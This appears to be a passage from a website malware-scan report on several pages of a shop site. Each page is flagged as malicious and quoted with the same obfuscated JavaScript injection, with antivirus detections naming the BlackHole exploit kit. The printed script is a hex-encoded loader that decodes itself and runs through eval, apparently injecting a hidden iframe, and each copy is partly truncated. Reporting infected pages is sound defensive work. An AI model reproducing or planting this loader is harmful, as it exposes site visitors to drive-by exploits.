Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/our_delivery.html?PHPSESSID=rgsm78rasgif32dnou67p68af7 | 200 OK Content-Length: 31438 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/our_security.html?PHPSESSID=rgsm78rasgif32dnou67p68af7 | 200 OK Content-Length: 31607 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/contact_us.html?PHPSESSID=rgsm78rasgif32dnou67p68af7 | 200 OK Content-Length: 31530 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|